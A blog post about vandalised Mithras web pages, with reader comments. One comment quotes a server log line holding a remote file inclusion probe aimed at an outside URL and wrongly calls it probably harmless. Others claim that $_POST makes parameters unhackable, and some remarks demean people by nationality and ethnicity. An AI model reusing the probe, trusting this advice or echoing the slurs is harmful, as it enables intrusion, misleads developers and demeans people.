Vandalism already at the Mithras pages!

I was doing a little work on the scripts, and happened to open an obsolete page on the site.  To my horror I found that it had been vandalised, with crummy html for some car insurance.  The vandal had edited it a couple of times, first inserting his muck into a footnote, and then, growing bolder, erasing all the content and pasting in his rubbish.  The IP address responsible was from the United Arab Emirates.

I have it all backed up, so nothing was lost and I have reverted the changes.  What worries me, tho, is how he managed to edit it at all.  Only I have access, as far as I know.  He did edit it through the front-end system, as there are traces in the logs.

It’s a sad change from the last time I made pages available online for online editing.  Back in 2006, people just didn’t do this kind of thing.  Now every two-bit criminal is online.  I shall have to implement some better form of security, and waste useful time on so doing.

How I curse the selfish morons who hire nobodies in places like the UAE to damage the interests of everyone else!

Wonder how the swine found his way in.  It’s not particularly secure, but it shouldn’t be possible for anyone else to edit.

14 Responses to “Vandalism already at the Mithras pages!”


  1. Robert Consoli

    It looks to me like you may be passing parameters in PHP with ‘put’ which means that they show up in the URL line. Hackers can then modify these params to do all sorts of things. You could try researching passing parameters by ‘get’ instead which means that they do not show up on the URL line and can’t be hacked. This is a kind of first line defense in .php If this doesn’t apply to you then I apologize.

  2. Robert Consoli

    Sorry for the misinformation. The method to use is $_POST and not $_GET. $_GET is a known security hole. Using method $_GET makes parameters visible on the URL line. Sorry for the first post; I guess I’m rusty. It looks to me like your method display.php uses a parameter called ‘page’. If you’re using $_GET on the other end then you might want to rethink it.

  3. Roger Pearse

    No, you’re quite right. I simply didn’t expect my little site to attract people willing to sit there and mess with the. parameters. I added a few extra checks last night, and I’ll have to do some more. Liked yr site, btw … somenice ideas in there.

  4. Anthony

    A particularly apt use of the word ‘swine’, particularly considering the probable ethnic origin of the vandal. I love it :)

  5. Robert Consoli

    Thanks for the comments about my site. With respect to your vandal think of it as a test of the maturity of your code. This happens to everybody all the time; you should see my logs.

    Best,
    Bob

  6. Roger Pearse

    Interesting … what sort of stuff do you get? I ought to look at the http logs (i implemented some logging for the mithras site, but not with vandalism in mind)

  7. Roger Pearse

    Oink, I say.

  8. Roger Pearse

    Test

  9. Robert Consoli

    Hi Roger,
    Here’s the sort of thing that can happen (although I don’t think that this happened to you) as illustrated by a line from my logs:
    /searchn.php?zoom_query=http://www.la-cloture-electrique.fr/css/made.jpg? Mozilla/3.0 (compatible; Indy Library) 177.xxx.18.182
    This line calls my search engine, searchn.php with the regular parameter ‘zoom_query’. Ordinarily zoom_query would be followed by a search string such as ‘Mithras’ or ‘kylix’. Here it’s followed by another URL: http://www.la-cloture-electrique.fr/css/made(dot)jpg (Don’t click on this.)
    Apparently some targetted sites will try to execute that line and, instead of going where they should, will go somewhere else entirely. I think that this is just to raise their hits for Google ranking and isn’t necessarily nefarious; it’s more like an intentional misunderstanding. As I say I don’t know that this happened to you. What I do to foil such an attack is to place the originating IP address on my .htaccess list. I don’t even decide this; the software does this automatically. I also examine every character that comes through the URL or the search box. I reject any string that has characters in it which are other than those I specifically allow. This is often enough to stop many malicious attacks. In your case it sounds like you need to change some passwords to be something really difficult.
    Best,
    Bob

  10. Roger Pearse

    Hi Bob,

    This is really helpful – thank you. I will investigate!

    Roger

  11. Brian Kelly

    Hi, Roger – came across your site recently and find it very interesting (I teach Latin and Classics and am reading more Augustine these days). I assume you know the Radio 4 ‘In Our Time’ programme last week was on Mithraism?

    Thanks again,

    Brian Kelly

  12. Roger Pearse

    Hi Brian,

    Good for you — how do you find the market for Latin teaching these days? Yes, I was tipped off on that programme, and the further reading material on the BBC webpage seemed sound. But I don’t have a spare 45 minutes to listen!

    All the best,

    Roger

  13. Geoffrey Heriot

    Hello Roger:

    I see where you have posted a comment on my picture of Mithras slaying the bull. I gather the CIMRM 593 is the catalogue number of this work? Is that correct?
    Thanks for your interest!

    Geoffrey Heriot

  14. Roger Pearse

    Hi Geoffrey,

    That’s right! The Mithras monuments were all collected in the 50′s and published by Maarten Vermaseren in the “Corpus Inscriptionum et Monumentum Religionis Mithriacae” (collection of inscriptions and monuments of the Mithriac religion), and each assigned a numeral. The scholarly literature always uses this reference.

    Your photo was a nice one of CIMRM 593, which is the earliest tauroctony known (first quarter of the 2nd century A.D.) although the statue has been heavily and badly restored. People may well search for “CIMRM 593″, and if so, I thought it would be good if your picture came up.

    Here are my notes on CIMRM 593.

    More details on Mithraic monuments may be found via my index / gallery here.